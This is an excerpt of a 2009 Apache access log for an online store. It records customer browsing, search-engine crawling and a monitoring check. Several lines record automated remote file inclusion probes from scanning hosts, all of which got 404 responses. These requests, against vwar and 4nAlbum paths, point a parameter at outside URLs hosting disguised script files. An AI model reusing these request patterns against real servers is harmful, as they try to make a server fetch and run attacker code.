83.132.125.167 - - [10/Jul/2009:04:42:24 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145154F01D4F600CBA107O+M37+ENG HTTP/1.1" 200 72195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145154C02247600B2F107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:42:26 -0400] "GET /images/items/SUTURE_PLAIN_THUMB.JPG HTTP/1.1" 200 2851 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145154F01D4F600CBA107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
121.124.127.34 - - [10/Jul/2009:04:42:45 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:42:45 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
121.124.127.34 - - [10/Jul/2009:04:42:45 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jul/2009:04:42:50 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.132.125.167 - - [10/Jul/2009:04:42:50 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145154109B4B600E6C107O+M37+ENG HTTP/1.1" 200 71424 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145154F01D4F600CBA107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
69.93.252.132 - - [10/Jul/2009:04:43:02 -0400] "GET /logs/access_log.Q109061600//4nAlbum/public/displayCategory.php?basepath=http://www.perfumechaletusa.com/images/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
69.93.252.132 - - [10/Jul/2009:04:43:07 -0400] "GET /logs/access_log.Q109062100//4nAlbum/public/displayCategory.php?basepath=http://www.perfumechaletusa.com/images/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jul/2009:04:43:10 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145154A08442600F39107O+M37+ENG HTTP/1.1" 200 70215 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145154109B4B600E6C107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
66.249.68.247 - - [10/Jul/2009:04:43:23 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L0057BE3369E8F2004B59041+WSEQ(S0060):1+OUITEM(A0200):5099250 HTTP/1.1" 200 27022 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.132.125.167 - - [10/Jul/2009:04:43:25 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164E01C496000E2107O+M37+ENG HTTP/1.1" 200 69446 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145154A08442600F39107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:43:26 -0400] "GET /images/items/0032938_THUMB.JPG HTTP/1.1" 200 1925 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164E01C496000E2107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:43:26 -0400] "GET /images/items/0032935_THUMB.JPG HTTP/1.1" 200 2113 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164E01C496000E2107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
83.132.125.167 - - [10/Jul/2009:04:43:26 -0400] "GET /images/items/0032936_THUMB.JPG HTTP/1.1" 200 2284 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164E01C496000E2107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
76.12.17.218 - - [10/Jul/2009:04:43:32 -0400] "GET /logs/access_log.Q109061600//4nAlbum/public/displayCategory.php?basepath=http://www.perfumechaletusa.com/images/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
83.132.125.167 - - [10/Jul/2009:04:43:36 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L1145164B0034D600195107O+M37+ENG HTTP/1.1" 200 68344 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L1145164E01C496000E2107O+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6; SLCC1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
